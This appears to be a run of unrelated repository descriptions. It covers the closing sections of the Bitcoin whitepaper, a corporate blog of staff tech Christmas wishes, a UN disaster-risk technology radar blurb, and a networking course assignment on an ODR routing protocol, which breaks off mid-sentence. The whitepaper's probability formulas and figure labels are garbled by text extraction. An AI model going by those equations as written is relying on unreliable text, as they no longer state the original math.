model achieves a level of privacy by limiting access to information to the parties involved and the trusted third party. The necessity to announce all transactions publicly precludes this method, but privacy can still be maintained by breaking the flow of information in another place: by keeping public keys anonymous. The public can see that someone is sending an amount to someone else, but without information linking the transaction to anyone. This is similar to the level of information released by stock exchanges, where the time and size of individual trades, the "tape", is made public, but without telling who the parties were. Traditional Privacy Model Identities Transactions New Privacy Model Identities Transactions As an additional firewall, a new key pair should be used for each transaction to keep them from being linked to a common owner. Some linking is still unavoidable with multi-input transactions, which necessarily reveal that their inputs were owned by the same owner. The risk is that if the owner of a key is revealed, linking could reveal other transactions that belonged to the same owner. 11. Calculations We consider the scenario of an attacker trying to generate an alternate chain faster than the honest chain. Even if this is accomplished, it does not throw the system open to arbitrary changes, such as creating value out of thin air or taking money that never belonged to the attacker. Nodes are not going to accept an invalid transaction as payment, and honest nodes will never accept a block containing them. An attacker can only try to change one of his own transactions to take back money he recently spent. The race between the honest chain and an attacker chain can be characterized as a Binomial Random Walk. The success event is the honest chain being extended by one block, increasing its lead by +1, and the failure event is the attacker's chain being extended by one block, reducing the gap by -1. The probability of an attacker catching up from a given deficit is analogous to a Gambler's Ruin problem. Suppose a gambler with unlimited credit starts at a deficit and plays potentially an infinite number of trials to try to reach breakeven. We can calculate the probability he ever reaches breakeven, or that an attacker ever catches up with the honest chain, as follows [8]: p = probability an honest node finds the next block q = probability the attacker finds the next block qz = probability the attacker will ever catch up from z blocks behind Trusted Third Party q ={ 1 if p≤q} z q/pz if pq 6 Counterparty Public Public Given our assumption that p > q, the probability drops exponentially as the number of blocks the attacker has to catch up with increases. With the odds against him, if he doesn't make a lucky lunge forward early on, his chances become vanishingly small as he falls further behind. We now consider how long the recipient of a new transaction needs to wait before being sufficiently certain the sender can't change the transaction. We assume the sender is an attacker who wants to make the recipient believe he paid him for a while, then switch it to pay back to himself after some time has passed. The receiver will be alerted when that happens, but the sender hopes it will be too late. The receiver generates a new key pair and gives the public key to the sender shortly before signing. This prevents the sender from preparing a chain of blocks ahead of time by working on it continuously until he is lucky enough to get far enough ahead, then executing the transaction at that moment. Once the transaction is sent, the dishonest sender starts working in secret on a parallel chain containing an alternate version of his transaction. The recipient waits until the transaction has been added to a block and z blocks have been linked after it. He doesn't know the exact amount of progress the attacker has made, but assuming the honest blocks took the average expected time per block, the attacker's potential progress will be a Poisson distribution with expected value: = z qp To get the probability the attacker could still catch up now, we multiply the Poisson density for each amount of progress he could have made by the probability he could catch up from that point: ∞ ke−{q/pz−k ifk≤z} ∑k=0 k!⋅ 1 ifkz Rearranging to avoid summing the infinite tail of the distribution... z ke− z−k 1−∑k=0 k! 1−q/p Converting to C code... #include <math.h> double AttackerSuccessProbability(double q, int z) { double p = 1.0 - q; double lambda = z * (q / p); double sum = 1.0; int i, k; for (k = 0; k <= z; k++) { double poisson = exp(-lambda); for (i = 1; i <= k; i++) poisson *= lambda / i; sum -= poisson * (1 - pow(q / p, z - k)); } return sum; } 7 Running some results, we can see the probability drop off exponentially with z. q=0.1 z=0 P=1.0000000 z=1 P=0.2045873 z=2 P=0.0509779 z=3 P=0.0131722 z=4 P=0.0034552 z=5 P=0.0009137 z=6 P=0.0002428 z=7 P=0.0000647 z=8 P=0.0000173 z=9 P=0.0000046 z=10 P=0.0000012 q=0.3 z=0 P=1.0000000 z=5 P=0.1773523 z=10 P=0.0416605 z=15 P=0.0101008 z=20 P=0.0024804 z=25 P=0.0006132 z=30 P=0.0001522 z=35 P=0.0000379 z=40 P=0.0000095 z=45 P=0.0000024 z=50 P=0.0000006 Solving for P less than 0.1%... P < 0.001 q=0.10 z=5 q=0.15 z=8 q=0.20 z=11 q=0.25 z=15 q=0.30 z=24 q=0.35 z=41 q=0.40 z=89 q=0.45 z=340 12. Conclusion We have proposed a system for electronic transactions without relying on trust. We started with the usual framework of coins made from digital signatures, which provides strong control of ownership, but is incomplete without a way to prevent double-spending. To solve this, we proposed a peer-to-peer network using proof-of-work to record a public history of transactions that quickly becomes computationally impractical for an attacker to change if honest nodes control a majority of CPU power. The network is robust in its unstructured simplicity. Nodes work all at once with little coordination. They do not need to be identified, since messages are not routed to any particular place and only need to be delivered on a best effort basis. Nodes can leave and rejoin the network at will, accepting the proof-of-work chain as proof of what happened while they were gone. They vote with their CPU power, expressing their acceptance of valid blocks by working on extending them and rejecting invalid blocks by refusing to work on them. Any needed rules and incentives can be enforced with this consensus mechanism. 8 References [1] W. Dai, "b-money," http://www.weidai.com/bmoney.txt, 1998. [2] H. Massias, X.S. Avila, and J.-J. Quisquater, "Design of a secure timestamping service with minimal trust requirements," In 20th Symposium on Information Theory in the Benelux, May 1999. [3] S. Haber, W.S. Stornetta, "How to time-stamp a digital document," In Journal of Cryptology, vol 3, no 2, pages 99-111, 1991. [4] D. Bayer, S. Haber, W.S. Stornetta, "Improving the efficiency and reliability of digital time-stamping," In Sequences II: Methods in Communication, Security and Computer Science, pages 329-334, 1993. [5] S. Haber, W.S. Stornetta, "Secure names for bit-strings," In Proceedings of the 4th ACM Conference on Computer and Communications Security, pages 28-35, April 1997. [6] A. Back, "Hashcash - a denial of service counter-measure," http://www.hashcash.org/papers/hashcash.pdf, 2002. [7] R.C. Merkle, "Protocols for public key cryptosystems," In Proc. 1980 Symposium on Security and Privacy, IEEE Computer Society, pages 122-133, April 1980. [8] W. Feller, "An introduction to probability theory and its applications," 1957. 9
TanayGhanshyam / Crispy Octo GuideWe have come a long way since I was a child in the 1960s when all I wanted for Christmas was a slinky and some Rock’Em – Sock’Em Robots. Now imagine we have traveled ten years into the future, and it is Christmas 2031. Alexa has replaced kids’ parents and Santa Claus. Every toy is connected to the Internet and looks like a robot version of the animal it represents. Clean thermonuclear Christmas trees will be providing us with radiant, gamma-ray energy for all our holiday needs. Pogo sticks have also made a comeback, but they are solar-powered and can leap entire city blocks. And while I am busy pretending to be the Ghost of Christmas Future, I thought it would also be fun to ask the Office of the CTO team about their predictions for futuristic, technical toys. So, I posed these two questions: What cool TECHNICAL toy or gadget would you like Santa to bring you this year in 2021? As a participating member of the Office of the CTO, what cool TECHNICAL toy or gadget (that has not yet been invented) would you like Santa to bring you in 10 years from now in 2031? christmas wishlist for the octo team overlay You know what? We just might see I see a sneak preview of some of these magical tech toys of the future in just a few weeks at the CES 2022 conference. In the meantime, take a look at the wish list from all of our Extreme technical gurus: Marcus Burton – Wireless and Cloud Architect Christmas Wish 2021: Is a Tesla Cybertruck an option? I’ll even take a prototype. That will scratch several technology itches at the same time. Think about it…EV, autonomous driving, AI, 5G probably, cloud-connected, mobile-first, and all the best in materials sciences and mechanical engineering applied to trucks. What more could an outdoorsy tech guy want? Christmas Wish 2031: I’m kinda thinking that while everyone else has their brain slurped out in the metaverse (with VR!), I will prefer to go to the actual mountains. But you know, I have a wife and kids, so I have to think about safety. So here’s my wish: a smart personal device that has a full week of battery life (using ultra-thin silicon wafers) with rapid solar charging, LEO satellite connectivity (for sending “eat your heart out” 3D pics to my friends from the “there’s no 6G here” wilderness), and ultra-HD terrain feature maps for modern navigation. Carla Guzzetti – VP, Experience, Messaging & Enablement Christmas Wish 2021: I want this: Meeting Owl Pro – 360-Degree, 1080p HD Smart Video Conference Camera, Microphone, and Speaker Christmas Wish 2031: I want a gadget where we can have virtual meetings without the need for a wearable! Who wants to wear heavy goggles all day? Doug McDonald – Director of Product Management Christmas Wish 2021: As a technologist often looking for a balance between screen time and health and fitness I hope Santa brings me the Aura Strap. The Aura strap adds additional IoT sensory capabilities to compliment your Apple smartwatch. Bioelectrical impedance analysis is the cutting-edge science behind the AURA Strap. This innovation provides a way to truly see how your body changes over the course of a day. Their body composition analysis includes fat, muscle mass, minerals, and hydration; providing personalized insights that improve the results of your workouts, diet, and your lifestyle as a whole. Christmas Wish 2031: Hopefully, this innovation will be here sooner. Still, in the spirit of my first wish from Santa, I also hope to have a service engine warning light for me. The concept is utilizing advancements in biomedical sensory devices to pinpoint potential changes in your physical metrics that may help in seeking medical attention sooner than later if variances in health data occur. I spoke about this concept in the Digital Diagnosis episode of the Inflection Points podcast from the Office of the CTO. Ed Koehler – Principal Engineer Christmas Wish 2021: My answers are short and sweet. I want a nice drone with high-resolution pan, tilt, and zoom (PTZ) cameras. Christmas Wish 2031: In ten years, I want a drone that I can sit inside and fly away! Puneet Sehgal – Business Initiatives Program Manager Christmas Wish 2021: I have always wanted to enjoy the world from a bird’s eye view. Therefore, my wish is for Santa to bring me a good-quality drone camera this year. It is amazing how quickly drones have evolved from commercial /military use to becoming a personal gadget. Christmas Wish 2031: In 2031, I wish Santa could get me a virtual reality (VR) trainer to help me internalize physical motion by looking at a simulation video while sending an electrical impulse to mimic it. It will open endless possibilities, and I could become an ice skater, a karate expert, or a pianist – all in one. Maybe similar research is already being done, but we are far away from something like this maturing for practical use. So, who knows – it’s Santa after all and we are talking 2031! Tim Harrison – Director of Product Marketing, Service Provider Christmas Wish 2021: This year, I would love to extend my audio recording setup and move from a digital 24 channel mixer to a control surface that integrates with my DAW (digital audio workstation) and allows me to use my outboard microphone pre-amps. I’ve been looking at an ICON QCon Pro G2 plus one QCon EX G2 extender to give me direct control over 16 channels at once (I use 16 channels just for my drum kit). Christmas Wish 2031: Ten years from now, I sincerely hope to receive an anti-gravity platform. First, I’ll be old, and climbing stairs will have become more challenging for these creaky old bones. Secondly, who hasn’t hoped for a REAL hoverboard? Once we know what gravity is “made of,” we can start making it easier to manipulate objects on earth and make space more habitable for human physiology. Either that or a puppy. Puppy sitting Divya Balu Pazhayannur – Director of Business Initiatives Christmas Wish 2021: I’m upgrading parts of my house over the holidays and browsing online for kitchen and laundry appliances. If you had told me that I would be spending three hours reading blogs on choosing the right cooktop for me, I would not have believed you. Does it have the right power, is it reliable, is it Wi-Fi enabled, can you talk to it – I’m kidding on that last one. Having said that, I’d love to get the Bosch Benchmark Gas Stovetop. Although I can’t speak to my appliance, its minimalist look has me writing it down on my wish list for Santa. I’ll even offer him some crispy dosas in exchange. Christmas Wish 2031: Apart from flying cars and personal robot assistants, I’d love to get the gift of better connectivity. I miss my family and friends in India, and it would be amazing to engage with them through holographic technology. I imagine it would allow for a much higher level of communication than today’s ‘talking head’ approach. Although do I want my family sitting with me in my living room? Still – I’d like to think a holograph would be just fantastic. Yury Ostrovsky – Sr. Technology Manager Christmas Wish 2021: I believe 2022 will be the year of VR toys. Virtual Reality is already popular, but I believe more applications will be developed in this area. We might see radio waves coming from different sources (Wi-Fi, LTE, 5G, BT, etc.) and visualize propagation in real-time. Christmas Wish 2031: “Prediction is very difficult, especially if it’s about the future” – Niels Bohr Kurt Semba – Principal Architect Christmas Wish 2021: The Crown from Neurosity. It helps you get and stay in a deep focus to improve your work and gaming results. Christmas Wish 2031: A non-evasive health device that can quickly look deep into your body and cells and explain why you are not feeling well today. Jon Filson – Senior Producer, Content Christmas Wish 2021: I want a large rollable TV by LG. In part because I watch a lot of football. And while I have a Smart TV, I still can’t get it to connect to my Bluetooth speaker … so while I love it, I want it to work better, and isn’t that so often the way with tech? But more than that, I don’t like and have never liked that rooms have to be designed around TVs. They are big, which is fine, but they are often in the way, which is less so. They should disappear when not in use. It’s $100,000 so I don’t expect it any time soon. But it’s an idea whose time has come. Christmas Wish 2031: I cheated on this one and asked my 12-year-old son Jack what he would want. It’s the portal gun, from Rick and Morty, a show in which a crazed scientist named Rick takes his grandson Morty on wacky adventures in a multi-verse. That last part is important to me. Kids today are already well into multi-verses, while we adults are just struggling to make one decent Metaverse. The next generation is already way ahead of us digitally speaking, it’s clear. Alexey Reznik – Senior UX Designer Christmas Wish 2021: This awesome toy: DJI Mavic 2 Pro – Drone Quadcopter UAV with Hasselblad Camera 3-Axis Gimbal HDR 4K Video Adjustable Aperture 20MP 1″ CMOS Sensor, up to 48mph, Gray Christmas Wish 2031: Something along these lines: BMW Motorrad VISION NEXT 100 BMW Motorcycle Michael Rash – Distinguished Engineer – Security Christmas Wish 2021: Satechi USB-C Multiport MX Adapter – Dual 4K HDMI. Christmas Wish 2031: A virtual reality headset that actually works. Alena Amir – Senior Content and Communications Manager Christmas Wish 2021: With conversations around VR/AR and the metaverse taking the world by storm, Santa could help out with an Oculus Quest. Purely for research purposes of course! Christmas Wish 2031: The 1985 movie, Back to the Future, was a family favorite and sure we didn’t get it all exactly right by 2015 but hey, it’s almost 2022! About time we get those hoverboards! David Coleman – Director of Wireless Christmas Wish 2021: Well, it looks like drones are the #1 wish item for 2021, and I am no exception. My wife and I just bought a home in the mountains of Blue Ridge, Georgia, where there is an abundance of wildlife. I want a state-of-the-art drone for bear surveillance. Christmas Wish 2031: In ten years, I will be 71 years old, and I hope to be at least semi-retired and savoring the fruits of my long tech career. Even though we are looking to the future, I want a time machine to revisit the past. I would travel back to July 16th, 1969, and watch Apollo 11 liftoff from Cape Kennedy to the moon. I actually did that as a nine-year-old kid. Oh, and I would also travel back to 1966 and play with my Rock’Em – Sock’Em Robots. Rock'em Sock'em Robots To summarize, our peeps in the Office of the CTO all envision Christmas 2031, where the way we interact as a society will have progressed. In 2021, we already have unlimited access to information, so future tech toys might depend less on magical new technologies and more on the kinds of experiences these new technologies can create. And when those experiences can be shared across the globe in real-time, the world gains an opportunity to learn from each other and grow together in ways that would never have been possible.
SDG-AI-Lab / Digital Technologies RadarSDG AI Lab in partnership with UNDP DRT and CBi has developed an online tool – a Frontier Technology Radar for Disaster Risk Reduction (FTR4DRR), which allows for the systematic tracking and understanding of frontier technologies as they are developed. This would categorize technological solutions according to their technology type, disaster/crisis type and maturity level. Moreover, it is expected that the tool developed would encourage knowledge and experience-sharing among development stakeholders on the use of frontier technologies in disaster and conflict contexts. The Frontier Technology Radar for Disaster Risk Reduction (FTR4DRR) aims to highlight the potential of technological solutions in disaster contexts to those working in the fields of risk reduction, response and recovery. It supports development stakeholders to navigate the variety of existing and emerging technologies and their possible use cases.
SOYJUN / Implement ODR ProtocolOverview For this assignment you will be developing and implementing : An On-Demand shortest-hop Routing (ODR) protocol for networks of fixed but arbitrary and unknown connectivity, using PF_PACKET sockets. The implementation is based on (a simplified version of) the AODV algorithm. Time client and server applications that send requests and replies to each other across the network using ODR. An API you will implement using Unix domain datagram sockets enables applications to communicate with the ODR mechanism running locally at their nodes. I shall be discussing the assignment in class on Wednesday, October 29, and Monday, November 3. The following should prove useful reference material for the assignment : Sections 15.1, 15.2, 15.4 & 15.6, Chapter 15, on Unix domain datagram sockets. PF_PACKET(7) from the Linux manual pages. You might find these notes made by a past CSE 533 student useful. Also, the following link http://www.pdbuchan.com/rawsock/rawsock.html contains useful code samples that use PF_PACKET sockets (as well as other code samples that use raw IP sockets which you do not need for this assignment, though you will be using these types of sockets for Assignment 4). Charles E. Perkins & Elizabeth M. Royer. “Ad-hoc On-Demand Distance Vector Routing.” Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, New Orleans, Louisiana, February 1999, pp. 90 - 100. The VMware environment minix.cs.stonybrook.edu is a Linux box running VMware. A cluster of ten Linux virtual machines, called vm1 through vm10, on which you can gain access as root and run your code have been created on minix. See VMware Environment Hosts for further details. VMware instructions takes you to a page that explains how to use the system. The ten virtual machines have been configured into a small virtual intranet of Ethernet LANs whose topology is (in principle) unknown to you. There is a course account cse533 on node minix, with home directory /users/cse533. In there, you will find a subdirectory Stevens/unpv13e , exactly as you are used to having on the cs system. You should develop your source code and makefiles for handing in accordingly. You will be handing in your source code on the minix node. Note that you do not need to link against the socket library (-lsocket) in Linux. The same is true for -lnsl and -lresolv. For example, take a look at how the LIBS variable is defined for Solaris, in /home/courses/cse533/Stevens/unpv13e_solaris2.10/Make.defines (on compserv1, say) : LIBS = ../libunp.a -lresolv -lsocket -lnsl -lpthread But if you take a look at Make.defines on minix (/users/cse533/Stevens/unpv13e/Make.defines) you will find only: LIBS = ../libunp.a -lpthread The nodes vm1 , . . . . . , vm10 are all multihomed : each has two (or more) interfaces. The interface ‘eth0 ’ should be completely ignored and is not to be used for this assignment (because it shows all ten nodes as if belonging to the same single Ethernet 192.168.1.0/24, rather than to an intranet composed of several Ethernets). Note that vm1 , . . . . . , vm10 are virtual machines, not real ones. One implication of this is that you will not be able to find out what their (virtual) IP addresses are by using nslookup and such. To find out these IP addresses, you need to look at the file /etc/hosts on minix. More to the point, invoking gethostbyname for a given vm will return to you only the (primary) IP address associated with the interface eth0 of that vm (which is the interface you will not be using). It will not return to you any other IP address for the node. Similarly, gethostbyaddr will return the vm node name only if you give it the (primary) IP address associated with the interface eth0 for the node. It will return nothing if you give it any other IP address for the node, even though the address is perfectly valid. Because of this, and because it will ease your task to be able to use gethostbyname and gethostbyaddr in a straightforward way, we shall adopt the (primary) IP addresses associated with interfaces eth0 as the ‘canonical’ IP addresses for the nodes (more on this below). Time client and server A time server runs on each of the ten vm machines. The client code should also be available on each vm so that it can be evoked at any of them. Normally, time clients/servers exchange request/reply messages using the TCP/UDP socket API that, effectively, enables them to receive service (indirectly, via the transport layer) from the local IP mechanism running at their nodes. You are to implement an API using Unix domain sockets to access the local ODR service directly (somewhat similar, in effect, to the way that raw sockets permit an application to access IP directly). Use Unix domain SOCK_DGRAM, rather than SOCK_STREAM, sockets (see Figures 15.5 & 15.6, pp. 418 - 419). API You need to implement a msg_send function that will be called by clients/servers to send requests/replies. The parameters of the function consist of : int giving the socket descriptor for write char* giving the ‘canonical’ IP address for the destination node, in presentation format int giving the destination ‘port’ number char* giving message to be sent int flag if set, force a route rediscovery to the destination node even if a non-‘stale’ route already exists (see below) msg_send will format these parameters into a single char sequence which is written to the Unix domain socket that a client/server process creates. The sequence will be read by the local ODR from a Unix domain socket that the ODR process creates for itself. Recall that the ‘canonical’ IP address for a vm node is the (primary) IP address associated with the eth0 interface for the node. It is what will be returned to you by a call to gethostbyname. Similarly, we need a msg_recv function which will do a (blocking) read on the application domain socket and return with : int giving socket descriptor for read char* giving message received char* giving ‘canonical’ IP address for the source node of message, in presentation format int* giving source ‘port’ number This information is written as a single char sequence by the ODR process to the domain socket that it creates for itself. It is read by msg_recv from the domain socket the client/server process creates, decomposed into the three components above, and returned to the caller of msg_recv. Also see the section below entitled ODR and the API. Client When a client is evoked at a node, it creates a domain datagram socket. The client should bind its socket to a ‘temporary’ (i.e., not ‘well-known’) sun_path name obtained from a call to tmpnam() (cf. line 10, Figure 15.6, p. 419) so that multiple clients may run at the same node. Note that tmpnam() is actually highly deprecated. You should use the mkstemp() function instead - look up the online man pages on minix (‘man mkstemp’) for details. As you run client code again and again during the development stage, the temporary files created by the calls to tmpnam / mkstemp start to proliferate since these files are not automatically removed when the client code terminates. You need to explicitly remove the file created by the client evocation by issuing a call to unlink() or to remove() in your client code just before the client code exits. See the online man pages on minix (‘man unlink’, ‘man remove’) for details. The client then enters an infinite loop repeating the steps below. The client prompts the user to choose one of vm1 , . . . . . , vm10 as a server node. Client msg_sends a 1 or 2 byte message to server and prints out on stdout the message client at node vm i1 sending request to server at vm i2 (In general, throughout this assignment, “trace” messages such as the one above should give the vm names and not IP addresses of the nodes.) Client then blocks in msg_recv awaiting response. This attempt to read from the domain socket should be backed up by a timeout in case no response ever comes. I leave it up to you whether you ‘wrap’ the call to msg_recv in a timeout, or you implement the timeout inside msg_recv itself. When the client receives a response it prints out on stdout the message client at node vm i1 : received from vm i2 <timestamp> If, on the other hand, the client times out, it should print out the message client at node vm i1 : timeout on response from vm i2 The client then retransmits the message out, setting the flag parameter in msg_send to force a route rediscovery, and prints out an appropriate message on stdout. This is done only once, when a timeout for a given message to the server occurs for the first time. Client repeats steps 1. - 3. Server The server creates a domain datagram socket. The server socket is assumed to have a (node-local) ‘well-known’ sun_path name which it binds to. This ‘well-known’ sun_path name is designated by a (network-wide) ‘well-known’ ‘port’ value. The time client uses this ‘port’ value to communicate with the server. The server enters an infinite sequence of calls to msg_recv followed by msg_send, awaiting client requests and responding to them. When it responds to a client request, it prints out on stdout the message server at node vm i1 responding to request from vm i2 ODR The ODR process runs on each of the ten vm machines. It is evoked with a single command line argument which gives a “staleness” time parameter, in seconds. It uses get_hw_addrs (available to you on minix in ~cse533/Asgn3_code) to obtain the index, and associated (unicast) IP and Ethernet addresses for each of the node’s interfaces, except for the eth0 and lo (loopback) interfaces, which should be ignored. In the subdirectory ~cse533/Asgn3_code (/users/cse533/Asgn3_code) on minix I am providing you with two functions, get_hw_addrs and prhwaddrs. These are analogous to the get_ifi_info_plus and prifinfo_plus of Assignment 2. Like get_ifi_info_plus, get_hw_addrs uses ioctl. get_hw_addrs gets the (primary) IP address, alias IP addresses (if any), HW address, and interface name and index value for each of the node's interfaces (including the loopback interface lo). prhwaddrs prints that information out. You should modify and use these functions as needed. Note that if an interface has no HW address associated with it (this is, typically, the case for the loopback interface lo for example), then ioctl returns get_hw_addrs a HW address which is the equivalent of 00:00:00:00:00:00 . get_hw_addrs stores this in the appropriate field of its data structures as it would with any HW address returned by ioctl, but when prhwaddrs comes across such an address, it prints a blank line instead of its usual ‘HWaddr = xx:xx:xx:xx:xx:xx’. The ODR process creates one or more PF_PACKET sockets. You will need to try out PF_PACKET sockets for yourselves and familiarize yourselves with how they behave. If, when you read from the socket and provide a sockaddr_ll structure, the kernel returns to you the index of the interface on which the incoming frame was received, then one socket will be enough. Otherwise, somewhat in the manner of Assignment 2, you shall have to create a PF_PACKET socket for every interface of interest (which are all the interfaces of the node, excluding interfaces lo and eth0 ), and bind a socket to each interface. Furthermore, if the kernel also returns to you the source Ethernet address of the frame in the sockaddr_ll structure, then you can make do with SOCK_DGRAM type PF_PACKET sockets; otherwise you shall have to use SOCK_RAW type sockets (although I would prefer you to use SOCK_RAW type sockets anyway, even if it turns out you can make do with SOCK_DGRAM type). The socket(s) should have a protocol value (no larger than 0xffff so that it fits in two bytes; this value is given as a network-byte-order parameter in the call(s) to function socket) that identifies your ODR protocol. The <linux/if_ether.h> include file (i.e., the file /usr/include/linux/if_ether.h) contains protocol values defined for the standard protocols typically found on an Ethernet LAN, as well as other values such as ETH_P_ALL. You should set protocol to a value of your choice which is not a <linux/if_ether.h> value, but which is, hopefully, unique to yourself. Remember that you will all be running your code using the same root account on the vm1 , . . . . . , vm10 nodes. So if two of you happen to choose the same protocol value and happen to be running on the same vm node at the same time, your applications will receive each other’s frames. For that reason, try to choose a protocol value for the socket(s) that is likely to be unique to yourself (something based on your Stony Brook student ID number, for example). This value effectively becomes the protocol value for your implementation of ODR, as opposed to some other cse 533 student's implementation. Because your value of protocol is to be carried in the frame type field of the Ethernet frame header, the value chosen should be not less than 1536 (0x600) so that it is not misinterpreted as the length of an Ethernet 802.3 frame. Note from the man pages for packet(7) that frames are passed to and from the socket without any processing in the frame content by the device driver on the other side of the socket, except for calculating and tagging on the 4-byte CRC trailer for outgoing frames, and stripping that trailer before delivering incoming frames to the socket. Nevertheless, if you write a frame that is less than 60 bytes, the necessary padding is automatically added by the device driver so that the frame that is actually transmitted out is the minimum Ethernet size of 64 bytes. When reading from the socket, however, any such padding that was introduced into a short frame at the sending node to bring it up to the minimum frame size is not stripped off - it is included in what you receive from the socket (thus, the minimum number of bytes you receive should never be less than 60). Also, you will have to build the frame header for outgoing frames yourselves (assuming you use SOCK_RAW type sockets). Bear in mind that the field values in that header have to be in network order. The ODR process also creates a domain datagram socket for communication with application processes at the node, and binds the socket to a ‘well known’ sun_path name for the ODR service. Because it is dealing with fixed topologies, ODR is, by and large, considerably simpler than AODV. In particular, discovered routes are relatively stable and there is no need for all the paraphernalia that goes with the possibility of routes changing (such as maintenance of active nodes in the routing tables and timeout mechanisms; timeouts on reverse links; lifetime field in the RREP messages; etc.) Nor will we be implementing source_sequence_#s (in the RREQ messages), and dest_sequence_# (in RREQ and RREP messages). In reality, we should (though we will not, for the sake of simplicity, be doing so) implement some sort of sequence number mechanism, or some alternative mechanism such as split-horizon for example, if we are to avoid possible scenarios of routing loops in a “count to infinity” context (I shall explain this point in class). However, we want ODR to discover shortest-hop paths, and we want it to do so in a reasonably efficient manner. This necessitates having one or two aspects of its operations work in a different, possibly slightly more complicated, way than AODV does. ODR has several basic responsibilities : Build and maintain a routing table. For each destination in the table, the routing table structure should include, at a minimum, the next-hop node (in the form of the Ethernet address for that node) and outgoing interface index, the number of hops to the destination, and a timestamp of when the the routing table entry was made or last “reconfirmed” / updated. Note that a destination node in the table is to be identified only by its ‘canonical’ IP address, and not by any other IP addresses the node has. Generate a RREQ in response to a time client calling msg_send for a destination for which ODR has no route (or for which a route exists, but msg_send has the flag parameter set or the route has gone ‘stale’ – see below), and ‘flood’ the RREQ out on all the node’s interfaces (except for the interface it came in on and, of course, the interfaces eth0 and lo). Flooding is done using an Ethernet broadcast destination address (0xff:ff:ff:ff:ff:ff) in the outgoing frame header. Note that a copy of the broadcast packet is supposed to / might be looped back to the node that sends it (see p. 535 in the Stevens textbook). ODR will have to take care not to treat these copies as new incoming RREQs. Also note that ODR at the client node increments the broadcast_id every time it issues a new RREQ for any destination node. When a RREQ is received, ODR has to generate a RREP if it is at the destination node, or if it is at an intermediate node that happens to have a route (which is not ‘stale’ – see below) to the destination. Otherwise, it must propagate the RREQ by flooding it out on all the node’s interfaces (except the interface the RREQ arrived on). Note that as it processes received RREQs, ODR should enter the ‘reverse’ route back to the source node into its routing table, or update an existing entry back to the source node if the RREQ received shows a shorter-hop route, or a route with the same number of hops but going through a different neighbour. The timestamp associated with the table entry should be updated whenever an existing route is either “reconfirmed” or updated. Obviously, if the node is going to generate a RREP, updating an existing entry back to the source node with a more efficient route, or a same-hops route using a different neighbour, should be done before the RREP is generated. Unlike AODV, when an intermediate node receives a RREQ for which it generates a RREP, it should nevertheless continue to flood the RREQ it received if the RREQ pertains to a source node whose existence it has heretofore been unaware of, or the RREQ gives it a more efficient route than it knew of back to the source node (the reason for continuing to flood the RREQ is so that other nodes in the intranet also become aware of the existence of the source node or of the potentially more optimal reverse route to it, and update their tables accordingly). However, since an RREP for this RREQ is being sent by our node, we do not want other nodes who receive the RREQ propagated by our node, and who might be in a position to do so, to also send RREPs. So we need to introduce a field in the RREQ message, not present in the AODV specifications, which acts like a “RREP already sent” field. Our node sets this field before further propagating the RREQ and nodes receiving an RREQ with this field set do not send RREPs in response, even if they are in a position to do so. ODR may, of course, receive multiple, distinct instances of the same RREQ (the combination of source_addr and broadcast_id uniquely identifies the RREQ). Such RREQs should not be flooded out unless they have a lower hop count than instances of that RREQ that had previously been received. By the same token, if ODR is in a position to send out a RREP, and has already done so for this, now repeating, RREQ , it should not send out another RREP unless the RREQ shows a more efficient, previously unknown, reverse route back to the source node. In other words, ODR should not generate essentially duplicative RREPs, nor generate RREPs to instances of RREQs that reflect reverse routes to the source that are not more efficient than what we already have. Relay RREPs received back to the source node (this is done using the ‘reverse’ route entered into the routing table when the corresponding RREQ was processed). At the same time, a ‘forward’ path to the destination is entered into the routing table. ODR could receive multiple, distinct RREPs for the same RREQ. The ‘forward’ route entered in the routing table should be updated to reflect the shortest-hop route to the destination, and RREPs reflecting suboptimal routes should not be relayed back to the source. In general, maintaining a route and its associated timestamp in the table in response to RREPs received is done in the same manner described above for RREQs. Forward time client/server messages along the next hop. (The following is important – you will lose points if you do not implement it.) Note that such application payload messages (especially if they are the initial request from the client to the server, rather than the server response back to the client) can be like “free” RREPs, enabling nodes along the path from source (client) to destination (server) node to build a reverse path back to the client node whose existence they were heretofore unaware of (or, possibly, to update an existing route with a more optimal one). Before it forwards an application payload message along the next hop, ODR at an intermediate node (and also at the final destination node) should use the message to update its routing table in this way. Thus, calls to msg_send by time servers should never cause ODR at the server node to initiate RREQs, since the receipt of a time client request implies that a route back to the client node should now exist in the routing table. The only exception to this is if the server node has a staleness parameter of zero (see below). A routing table entry has associated with it a timestamp that gives the time the entry was made into the table. When a client at a node calls msg_send, and if an entry for the destination node already exists in the routing table, ODR first checks that the routing information is not ‘stale’. A stale routing table entry is one that is older than the value defined by the staleness parameter given as a command line argument to the ODR process when it is executed. ODR deletes stale entries (as well as non-stale entries when the flag parameter in msg_send is set) and initiates a route rediscovery by issuing a RREQ for the destination node. This will force periodic updating of the routing tables to take care of failed nodes along the current path, Ethernet addresses that might have changed, and so on. Similarly, as RREQs propagate through the intranet, existing stale table entries at intermediate nodes are deleted and new route discoveries propagated. As noted above when discussing the processing of RREQs and RREPs, the associated timestamp for an existing table entry is updated in response to having the route either “reconfirmed” or updated (this applies to both reverse routes, by virtue of RREQs received, and to forward routes, by virtue of RREPs). Finally, note that a staleness parameter of 0 essentially indicates that the discovered route will be used only once, when first discovered, and then discarded. Effectively, an ODR with staleness parameter 0 maintains no real routing table at all ; instead, it forces route discoveries at every step of its operation. As a practical matter, ODR should be run with staleness parameter values that are considerably larger than the longest RTT on the intranet, otherwise performance will degrade considerably (and collapse entirely as the parameter values approach 0). Nevertheless, for robustness, we need to implement a mechanism by which an intermediate node that receives a RREP or application payload message for forwarding and finds that its relevant routing table entry has since gone stale, can intiate a RREQ to rediscover the route it needs. RREQ, RREP, and time client/server request/response messages will all have to be carried as encapsulated ODR protocol messages that form the data payload of Ethernet frames. So we need to design the structure of ODR protocol messages. The format should contain a type field (0 for RREQ, 1 for RREP, 2 for application payload ). The remaining fields in an ODR message will depend on what type it is. The fields needed for (our simplified versions of AODV’s) RREQ and RREP should be fairly clear to you, but keep in mind that you need to introduce two extra fields: The “RREP already sent” bit or field in RREQ messages, as mentioned above. A “forced discovery” bit or field in both RREQ and RREP messages: When a client application forces route rediscovery, this bit should be set in the RREQ issued by the client node ODR. Intermediate nodes that are not the destination node but which do have a route to the destination node should not respond with RREPs to an RREQ which has the forced discovery field set. Instead, they should continue to flood the RREQ so that it eventually reaches the destination node which will then respond with an RREP. The intermediate nodes relaying such an RREQ must update their ‘reverse’ route back to the source node accordingly, even if the new route is less efficient (i.e., has more hops) than the one they currently have in their routing table. The destination node responds to the RREQ with an RREP in which this field is 